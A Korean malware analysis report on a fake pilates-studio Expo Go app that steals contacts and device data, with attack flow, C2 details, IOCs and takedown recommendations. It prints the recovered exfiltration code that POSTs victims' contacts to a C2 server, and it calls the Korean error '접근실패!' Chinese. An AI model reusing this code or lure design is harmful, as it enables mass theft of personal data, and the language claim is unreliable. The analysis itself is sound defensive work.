Version v1.0 | Date: 2026-06-16 | Analyst: Deep Coding Lab
늘품필라테스(factory_vpilates)는 필라테스 스튜디오를 위장한 악성앱으로, [비공개] (Vultr, Singapore) 서버에서 운영되는 expowave 패밀리 공장형 악성앱 8종 중 하나이다. 동일 서버의 BT-Panel(宝塔面板) 환경에서 Metro 개발 서버 포트 8086을 통해 빌드된 Expo SDK 54 기반 앱이며, 피해자의 연락처 및 기기 정보를 C2 서버([비공개])로 탈취하는 것이 목적이다.
공격 흐름은 랜딩페이지([비공개]) → Expo Go 설치 유도 → exp:// 딥링크를 통한 Metro 번들 로드 → 가짜 로그인 UI → 연락처/기기정보 수집 → C2 전송 → 위장 오류 메시지("기기가 이 버전과 호환 되지 않습니다") 표시 순서로 진행된다.
NW-116 (Port-Sweep Factory Enumeration) 기법으로 발견되었으며, 소스맵 복원을 통해 TypeScript 원본 16개 파일을 확보하였다.
본 앱은 팩토리 8종 중 가장 활발하게 운영되고 있는 앱이다. C2 서버가 FULLY ACTIVE 상태이며, 정교한 가짜 사업체 웹사이트([비공개])까지 구축되어 있다. 관련 도메인([비공개])도 확인되었다.
위험도: CRITICAL — C2 완전 활성, 관리자 패널 가동, 정교한 랜딩페이지 운영 중.
항목 · 값
**앱 표시명** · 늘품필라테스
**내부 ID** · factory_vpilates
**패키지명** · com.cafe24.cass
**Slug** · cafe24
**SDK** · Expo SDK 54.0.0
**EAS Project ID** · dbf0683e-b9a5-4c9b-8fc6-9a078c4eb4d6
**EAS Owner** · wooteayang
**scopeKey** · @anonymous/cafe24-b3645f8a-418f-472c-918d-3cbaac29e050
**Manifest ID** · 9ad170ad-27b9-46c4-adcf-0658bb9c9b1b
**팩토리 포트** · 8086
**서버 경로** · /www/wwwroot/vp_expo
**패밀리** · expowave
**위장 테마** · 필라테스 스튜디오
**발견 기법** · NW-116 (Port-Sweep Factory Enumeration)
**랜딩페이지** · [비공개] (200, 50KB)
**관련 도메인** · [비공개] (maintenance)
**활성도** · **FULLY ACTIVE -- 팩토리 내 최고 활성**
항목 · 값
**IP** · [비공개]
**호스팅** · Vultr
**위치** · Singapore
**ASN** · AS20473 (The Constant Company, LLC)
**OS** · Linux
**관리 패널** · BT-Panel (宝塔面板)
포트 · 앱 · 서버 경로
8081 · telegraming_live (원본) · /www/wwwroot/telegram_expo
8082 · factory_daol · /www/wwwroot/daol_expo
8083 · factory_candy · /www/wwwroot/candy_expo
8084 · (미확인) · --
8085 · factory_daol_new · /www/wwwroot/daol_expo_new
**8086** · **factory_vpilates (본 앱)** · **/www/wwwroot/vp_expo**
8087 · (미확인) · --
8088 · (미확인) · --
BT-Panel(宝塔面板)은 중국에서 개발된 서버 관리 패널로, 웹 GUI를 통해 nginx, Node.js, 데이터베이스 등을 관리한다. 이 팩토리에서는 각 앱별로 독립된 wwwroot 디렉토리를 구성하고, Metro 개발 서버를 개별 포트에 바인딩하여 8개 악성앱을 동시 운영하는 구조이다.
factory_vpilates는 팩토리 내 다른 앱들과 달리 정교한 가짜 사업체 웹사이트를 운영한다:
항목 · 값
**랜딩 URL** · [비공개]
**응답 코드** · 200
**페이지 크기** · 약 50KB
**콘텐츠** · 정교한 가짜 필라테스 사업체 웹사이트
**위장 사업체명** · 늘품필라테스
**가짜 주소 1** · 수원시 소재
**가짜 주소 2** · 시흥시 소재
**가짜 전화 1** · 507-1359-940
**가짜 전화 2** · 507-1343-9642
50KB 규모의 정교한 랜딩페이지는 일반적인 피싱 페이지를 넘어, 실제 사업체로 오인할 수 있는 수준의 완성도를 보여준다. 수원과 시흥에 가짜 지점 주소를 배치한 것은 경기도 남부 지역 여성을 주요 타겟으로 삼고 있음을 시사한다.
도메인 · 상태 · 비고
[비공개] · 200 (활성) · 메인 랜딩페이지
[비공개] · FULLY ACTIVE · C2 서버
[비공개] · Under Maintenance · 보조/대체 도메인
[비공개](늘품필라테스의 로마자 표기)이 유지보수 상태로 존재하는 것은:
1. 메인 도메인([비공개]) 차단 시 대체 사용 목적
2. 또는 다른 지역/채널용 랜딩페이지 준비 중
소스맵 복원을 통해 다음 TypeScript/JavaScript 파일들이 확보되었다:
# · 파일 · 역할
1 · App.tsx · 메인 엔트리, 네비게이션 설정
2 · LoginScreen.tsx · 가짜 로그인 UI (이메일 + 비밀번호)
3 · HomeScreen.tsx · 데이터 수집 트리거
4 · api/client.ts · C2 통신 클라이언트
5 · api/exfil.ts · 데이터 탈취 핵심 로직
6 · utils/contacts.ts · 연락처 접근 및 수집
7 · utils/device.ts · 기기 정보 수집
8 · utils/permissions.ts · 권한 요청 관리
9 · components/LoadingBar.tsx · 위장 진행바 (10초 카운트다운)
10 · components/ErrorModal.tsx · 위장 오류 다이얼로그
11 · config/settings.ts · C2 URL, 앱 설정
12 · navigation/index.tsx · 스크린 네비게이션
13 · hooks/useExfil.ts · 데이터 수집 React Hook
14 · types/index.ts · TypeScript 타입 정의
15 · constants/strings.ts · UI 문자열 상수
16 · assets/theme.ts · 스타일/테마 설정
소스 코드 내 중국어 주석이 다수 발견되어 중국어권 개발자가 제작한 것으로 확인된다:
```typescript
// 请求通讯录权限 (연락처 권한 요청)
// 获取通讯录 (연락처 가져오기)
// 进度条动画 (진행바 애니메이션)
```
config/settings.ts (line 117):
```typescript
export const API_BASE_URL = "[비공개]
```
api/exfil.ts:
```typescript
const payload = {
platform: Platform.OS,
brand: Device.brand,
deviceId: Device.deviceId,
model: Device.modelName,
osVersion: Platform.Version,
phoneNumber: phoneNumber,
contacts: contactsArray,
timestamp: new Date().toISOString()
};
await fetch(`${API_BASE_URL}[비공개], {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify(payload)
});
```
constants/strings.ts (line 188):
```typescript
export const APP_TITLE = "늘품필라테스";
```
C2 서버로 전송되는 데이터의 JSON 구조:
```json
{
"platform": "android",
"brand": "Samsung",
"deviceId": "a1b2c3d4-e5f6-7890-abcd-ef1234567890",
"model": "SM-G998N",
"osVersion": "14",
"phoneNumber": "010-**-**",
"contacts": [
{
"name": "홍길동",
"phoneNumber": "010-**-**"
}
],
"timestamp": "2026-06-16T10:30:00.000Z"
}
```
데이터 · 수집 방법 · 위험도
연락처 전체 · Expo Contacts API · CRITICAL
기기 식별자 · Expo Device API · HIGH
전화번호 · SIM 정보 추출 · HIGH
OS 정보 · Platform API · MEDIUM
기기 모델 · Device API · LOW
브랜드 · Device API · LOW
타임스탬프 · JavaScript Date · LOW
메서드 · 경로 · 용도
POST · [비공개] · 탈취 데이터 수신 (메인 엔드포인트)
factory_vpilates는 C2가 FULLY ACTIVE이므로, 실제 데이터 수신이 가능한 상태이다:
```
[피해자 정보 비공개]
└─ POST [비공개] -> 500 (서버 처리 중)
└─ 데이터가 서버에 도달하여 처리 시도됨
└─ 관리자가 Trust Wallet 패널에서 수집 데이터 열람
```
[비공개] 500을 반환하는 것은 요청이 서버까지 도달하여 처리를 시도하고 있음을 의미한다. 단순 404(라우트 없음)와는 달리 백엔드 로직이 실행되고 있다.
항목 · 값
**도메인** · [비공개]
**상태** · **FULLY ACTIVE**
**보호** · Cloudflare
**Cloudflare Beacon** · 3352a36fc8ca4fd18ab67acc89199eb4
경로 · 상태코드 · 응답 · 해석
/ · 200 · "Hello World!" · 백엔드 활성
/login · 200 · Trust Wallet 관리자 패널 · 관리자 로그인 페이지 활성
/api · 200 · (API 루트) · API 라우팅 활성
[비공개] · 500 · (서버 에러) · 데이터 처리 시도 중
[비공개] · 200 · `{code:0, msg:"접근실패!"}` · 인증 기반 API 보호
항목 · 값
**경로** · /login
**테마** · Trust Wallet
**인증** · 이메일 + 비밀번호
**상태** · **완전 활성**
Trust Wallet 테마의 관리자 패널은 운영자가 수집된 피해자 데이터(연락처, 기기 정보)를 열람하고 관리하는 인터페이스이다. /login이 200을 반환하며 실제 로그인 폼을 제공하고 있다.
[비공개] 엔드포인트의 응답 {code:0, msg:"접근실패!"}`은:
· 중국어 에러 메시지("접근실패!")로 백엔드가 중국어 기반임을 확인
· code:0은 실패 상태 코드
· 인증 토큰 없이 접근하면 거부하는 보호 메커니즘
· 관리자 패널 로그인 후 발급되는 토큰으로만 접근 가능한 구조
추정 원인 · 가능성
DB 연결 설정 미완료 · 중간
필수 필드 누락 (빈 요청) · 높음
파일 저장 경로 미설정 · 낮음
의도적 에러 (실제로는 데이터 저장) · 중간
500 에러가 반환되더라도 서버 측에서 데이터를 수신하고 로깅할 가능성이 있다. 요청 자체는 서버에 도달하므로, [피해자 정보 비공개] 서버 로그에 기록될 수 있다.
앱 · C2 상태 · 성숙도
factory_daol · PARTIAL (nginx만) · 초기
factory_candy · BLOCKED (WAF 403) · 차단됨
factory_daol_new · PARTIAL (nginx만) · 초기
**factory_vpilates** · **FULLY ACTIVE** · **완전 운영**
factory_vpilates가 유일하게 FULLY ACTIVE인 것은 이 앱이 팩토리의 주력 캠페인임을 의미한다.
```
[1] [피해자 정보 비공개]
└─ 정교한 가짜 웹사이트([비공개], 50KB)로 접속 유도
└─ "늘품필라테스" -- 수원/시흥 소재 가짜 필라테스 스튜디오
└─ 가짜 전화번호: 507-1359-940, 507-1343-9642
└─ 카카오톡, 문자, 인스타그램 등으로 링크 배포
[2] Expo Go 설치 유도
└─ 랜딩페이지에서 "앱 체험을 위해 Expo Go 설치" 안내
└─ Google Play Store 정식 앱 설치 (의심 회피)
[3] exp:// 딥링크 실행
└─ exp://[비공개] 딥링크 클릭 유도
└─ Expo Go가 Metro 개발 서버에서 JS 번들 로드
[4] 가짜 로그인 화면
└─ LoginScreen.tsx 렌더링
└─ 이메일 + 비밀번호 입력 유도 (실제 인증 없음)
[5] 권한 요청
└─ 연락처 접근 권한 요청 (请求通讯录权限)
└─ READ_MEDIA_IMAGES 등 추가 권한
[6] 데이터 탈취
└─ 연락처 전체 수집 (获取通讯录)
└─ 기기 정보 수집 (platform, brand, deviceId, model, osVersion)
└─ 전화번호 추출
[7] C2 전송
└─ POST [비공개]
└─ JSON payload 전송
└─ 서버 응답: 500 (처리 시도 -- 데이터 수신 가능)
[8] 위장 오류 표시
└─ 10초 진행바 애니메이션 (进度条动画)
└─ "기기가 이 버전과 호환 되지 않습니다" 오류 메시지
└─ 피해자는 앱 호환성 문제로 인식
```
factory_vpilates는 팩토리 내 가장 정교한 사회공학을 구사한다:
· 정교한 가짜 웹사이트: 50KB 규모, 실제 사업체와 구분 어려움
· 실제 지역명 사용: 수원시, 시흥시 -- 경기도 남부 타겟
· 가짜 전화번호 배치: 507-1359-940, 507-1343-9642 (전화하면 연결 불가)
· Expo Go 활용: 정식 앱스토어 앱을 설치하므로 보안 의심 회피
· 보조 도메인: neulpum-pilates.shop으로 브랜드 신뢰도 강화
· 10초 로딩: 데이터 전송 완료를 위한 시간 확보
· 호환성 오류 위장: 피해자가 데이터 탈취를 인지하지 못하도록 함
권한 · 용도 · 악용 목적
READ_CONTACTS · 연락처 읽기 · 연락처 전체 탈취 -> 2차 피싱 타겟 확보
READ_MEDIA_IMAGES · 이미지 읽기 · 갤러리 사진 접근 (현재 코드에서는 미활용)
READ_EXTERNAL_STORAGE · 외부 저장소 읽기 · 파일 접근 범위 확장
WRITE_EXTERNAL_STORAGE · 외부 저장소 쓰기 · 파일 기록 (로그 등)
READ_MEDIA_VISUAL_USER_SELECTED · 선택된 미디어 읽기 · Android 14+ 미디어 접근
READ_CONTACTS가 핵심 악용 권한이다. 필라테스 앱이라는 위장 아래 "회원 관리" 또는 "친구 초대" 기능을 구실로 연락처 접근 권한을 요청하면 사용자가 자연스럽게 허용할 가능성이 높다. 특히 정교한 랜딩페이지를 통해 이미 신뢰가 형성된 상태이므로, 권한 허용 확률이 더 높다.
factory_vpilates는 [비공개] 서버에서 운영되는 expowave 패밀리 8종 중 하나이며, 팩토리 내 유일한 FULLY ACTIVE 앱이다. 모든 앱은 동일한 코드 기반에서 C2 URL(settings.ts line 117)과 앱 제목(strings.ts line 188)만 변경하여 생산된 클론이다.
포트 · 앱 · 표시명 · C2 · 상태
8081 · telegraming_live · (원본 템플릿) · -- · 기준 앱
8082 · factory_daol · 다올필라테스 · [비공개] · PARTIAL
8083 · factory_candy · 캔디 · [비공개] · BLOCKED
8085 · factory_daol_new · 다올필라테스 (신규) · [비공개] · PARTIAL
**8086** · **factory_vpilates** · **늘품필라테스** · **[비공개]** · **FULLY ACTIVE**
8084, 8087, 8088 · (미확인) · -- · -- · --
factory_vpilates가 유일한 FULLY ACTIVE 앱인 이유는 다음과 같이 추정된다:
1. 파일럿 앱: 팩토리 운영자가 먼저 하나의 앱을 완전히 가동하여 수익성/효과를 검증
2. 주력 캠페인: 다른 앱들은 대체/예비 인프라이고, vpilates가 실제 수익을 창출하는 주력
3. 시간차 배포: 앱을 순차적으로 활성화하는 중이며, vpilates가 첫 번째
정교한 랜딩페이지(50KB)와 보조 도메인([비공개])까지 구축한 것은, 이 앱에 가장 많은 리소스가 투입되었음을 보여준다.
팩토리 8종 중 확인된 4종 가운데 3종(daol, daol_new, vpilates)이 필라테스 위장이다. 이는 운영자가 필라테스를 주요 위장 테마로 선택한 전략적 판단을 반영한다:
· 타겟: 한국 20-40대 여성 (필라테스 주 이용층)
· 신뢰도: 필라테스 스튜디오는 지역 밀착형 소규모 사업체 -> 검증 어려움
· 앱 설치 동기: "수업 예약 앱", "회원 관리 앱" 등 합리적 설치 이유
· 권한 허용 동기: "회원 연락처 관리"로 연락처 권한 요청 자연스러움
유형 · 값 · 비고
**팩토리 IP** · [비공개] · Vultr Singapore, AS20473
**C2 도메인** · [비공개] · **FULLY ACTIVE**
**랜딩페이지** · [비공개] · 200, 50KB 가짜 사업체 사이트
**보조 도메인** · [비공개] · Under Maintenance
**Metro 서버** · [비공개] · exp:// 딥링크 대상
**C2 엔드포인트** · POST [비공개] · 데이터 수신 (500 반환)
**관리자 패널** · [비공개] · Trust Wallet 테마
유형 · 값
**패키지명** · com.cafe24.cass
**EAS Project ID** · dbf0683e-b9a5-4c9b-8fc6-9a078c4eb4d6
**EAS Owner** · wooteayang
**scopeKey** · @anonymous/cafe24-b3645f8a-418f-472c-918d-3cbaac29e050
**Manifest ID** · 9ad170ad-27b9-46c4-adcf-0658bb9c9b1b
**Cloudflare Beacon** · 3352a36fc8ca4fd18ab67acc89199eb4
유형 · 값
**가짜 사업체명** · 늘품필라테스
**가짜 주소 1** · 수원시 소재
**가짜 주소 2** · 시흥시 소재
**가짜 전화 1** · 507-1359-940
**가짜 전화 2** · 507-1343-9642
도메인 · 용도
[비공개] · 형제 앱 C2
[비공개] · 형제 앱 C2
[비공개] · 형제 앱 C2
경로 · 용도
/www/wwwroot/vp_expo · Metro 서버 루트
메커니즘 · 설명 · 상태
Cloudflare CDN/WAF · C2 및 랜딩페이지 전방 보호 · 활성
포트 분리 · 앱별 독립 포트 운영 · 활성
BT-Panel 관리 · 서버 GUI 관리 (접근 제한) · 활성
API 토큰 보호 · [비공개] 인증 필수 · 활성
보조 도메인 · [비공개] 대체 준비 · 대기
메커니즘 · 설명 · 상태
Expo Go 활용 · APK 직접 배포 대신 정식 앱 활용 · 활성
코드 서명 없음 · JS 번들이므로 별도 서명 불필요 · 해당없음
동적 로드 · Metro 서버에서 실시간 번들 로드 · 활성
메커니즘 · 설명
정교한 랜딩페이지 · 50KB, 실제 사업체와 구분 어려운 수준
가짜 주소/전화 배치 · 수원/시흥 지역 밀착형 위장
필라테스 위장 · 합법적 사업체로 신뢰 유도
호환성 오류 위장 · 탈취 후 자연스러운 앱 종료 유도
10초 딜레이 · 데이터 전송 완료를 위한 시간 확보
보조 도메인 · 메인 차단 시 즉시 전환 가능
Expo Go 기반 공격의 특성상 디바이스에 별도 APK가 설치되지 않으므로 포렌식 증거가 제한적이다. JS 번들은 Expo Go 캐시에만 일시적으로 저장되며, 앱 삭제 시 함께 제거된다.
API 토큰 보호([비공개] 접근실패!` 응답)는 분석가의 무인증 API 접근을 차단하여, C2의 내부 구조와 수집된 데이터를 보호한다.
본 앱은 NW-116 기법을 통해 발견되었다. 이 기법은 단일 IP에서 연속 포트(8081-8088)를 스캔하여 동일 팩토리에서 운영되는 다수의 Metro 개발 서버를 열거하는 방법이다.
절차:
1. telegraming_live의 Metro 서버 IP 확인 ([비공개])
2. 인접 포트 8082-8088 스캔
3. 각 포트에서 Metro 번들 요청
4. 소스맵 복원으로 개별 앱 설정 추출
5. C2 URL 및 앱 제목 식별
Expo Go Metro 서버는 개발 모드에서 소스맵을 제공하므로, 번들 JS에서 원본 TypeScript 코드를 복원할 수 있었다. 이를 통해 16개 소스 파일을 확보하고 공격 로직을 완전히 분석하였다.
factory_vpilates는 팩토리 내 유일한 FULLY ACTIVE C2를 보유하고 있어, 다른 앱들에서 불가능했던 심층 C2 분석이 가능했다:
· / 응답으로 백엔드 프레임워크 활성 확인
· /login으로 Trust Wallet 관리자 패널 확인
· [비공개] 500 응답으로 데이터 처리 로직 존재 확인
· [비공개] 접근실패! 응답으로 인증 메커니즘 확인
50KB 규모의 정교한 가짜 사업체 사이트([비공개])에서 추출한 가짜 사업체 정보(주소, 전화번호)는 운영자의 한국 시장 이해도를 보여주는 중요한 인텔리전스이다.
```
기법 점검:
· 시도한 기법: NW-116 (Port-Sweep Factory Enumeration), SA-080 (Sourcemap Recovery)
· 확장된 기법: FULLY ACTIVE C2에서 관리자 패널 구조 및 API 보호 메커니즘 분석
· 신규 기법: 없음
· 한계 발견: 관리자 패널 인증 우회 미시도 -- 향후 과제
```
항목 · 등급 · 근거
**전체 위험도** · **CRITICAL** · C2 완전 활성, 관리자 패널 가동, 정교한 랜딩페이지
데이터 영향 · CRITICAL · 연락처 전체 + 기기 식별자 탈취
확산 잠재력 · CRITICAL · 정교한 랜딩페이지 + 보조 도메인 + 팩토리 인프라
현재 활성도 · **CRITICAL** · **FULLY ACTIVE -- 현재 [피해자 정보 비공개] 가능**
탐지 난이도 · VERY HIGH · Expo Go + 정교한 가짜 사업체
1. 즉각적 피해: C2가 활성 상태이므로 현재 [피해자 정보 비공개] 가능
2. 1차 피해: 피해자의 전체 연락처 유출
3. 2차 피해: 유출된 연락처를 이용한 지인 대상 스미싱 확산
4. 3차 피해: 수집된 기기 정보를 활용한 표적 공격
5. 4차 피해: 메인 도메인 차단 시 neulpum-pilates.shop으로 캠페인 지속
· 팩토리 내 유일한 FULLY ACTIVE 앱 -- 즉각적 대응 필요
· 50KB 정교한 랜딩페이지는 일반 피싱과 차별화되는 높은 완성도
· 수원/시흥 지역 타겟은 경기도 남부 여성층을 겨냥
· [비공개] 500 응답은 데이터가 서버에 도달함을 의미 (로그 기록 가능)
· [비공개] 중국어 에러("접근실패!")는 백엔드 중국 개발 확인
· neulpum-pilates.shop은 차단 대비 대체 도메인으로 즉시 전환 가능
1. Cloudflare 긴급 신고: [비공개] + [비공개] 도메인 악용 신고 (FULLY ACTIVE -- 현재 피해 발생 가능)
2. Cloudflare 추가 신고: [비공개] 선제 신고 (대체 도메인)
3. Vultr 긴급 신고: [비공개] 서버에 대한 악용 신고 (FULLY ACTIVE C2 운영 증거 포함)
4. KISA 긴급 신고: 한국 대상 활성 피싱 앱으로 인터넷진흥원 긴급 신고
1. "늘품필라테스" 키워드로 유포되는 모든 링크 즉시 차단
2. [비공개] 도메인 차단
3. Expo Go를 통한 비정상적 exp:// 딥링크 접속 경고
4. 수원/시흥 지역 필라테스 커뮤니티에 경고 발행
5. 가짜 전화번호(507-1359-940, 507-1343-9642) 악용 번호로 신고
1. C2 서버 응답 변화 모니터링 ([비공개] 500 -> 200 전환 주시)
2. [비공개] 활성화 여부 모니터링
3. "늘품필라테스" 관련 신규 도메인 등록 모니터링
4. 팩토리 IP의 새로운 포트 개방 여부 모니터링
5. 관리자 패널(/login) 접속 패턴 모니터링
1. expowave 패밀리 전체에 대한 통합 IOC 배포
2. 필라테스 위장 패턴에 대한 탐지 규칙 수립
3. Expo Go 앱의 외부 Metro 서버 접속 제한 방안 논의
4. 팩토리 운영자 추적 (EAS Owner: wooteayang)
5. Trust Wallet 관리자 패널 인증 분석 (향후 과제)
6. 가짜 사업체 정보(수원/시흥 주소)를 통한 운영자 지역 추적
*Report generated by Deep Coding Lab -- Malware Analysis Division*
*Reference: telegraming_live (parent template app)*
*Family: expowave | Factory: [비공개] (Vultr Singapore)*
*STATUS: CRITICAL -- FULLY ACTIVE C2, MOST ACTIVE APP IN FACTORY*
본 보고서는 주식회사 아크링크 Deep-Coding 보안연구소가 피싱·몸캠피싱 피해자 구제를 목적으로 작성했습니다. 전체 열람·피해 상담: arklink.co.kr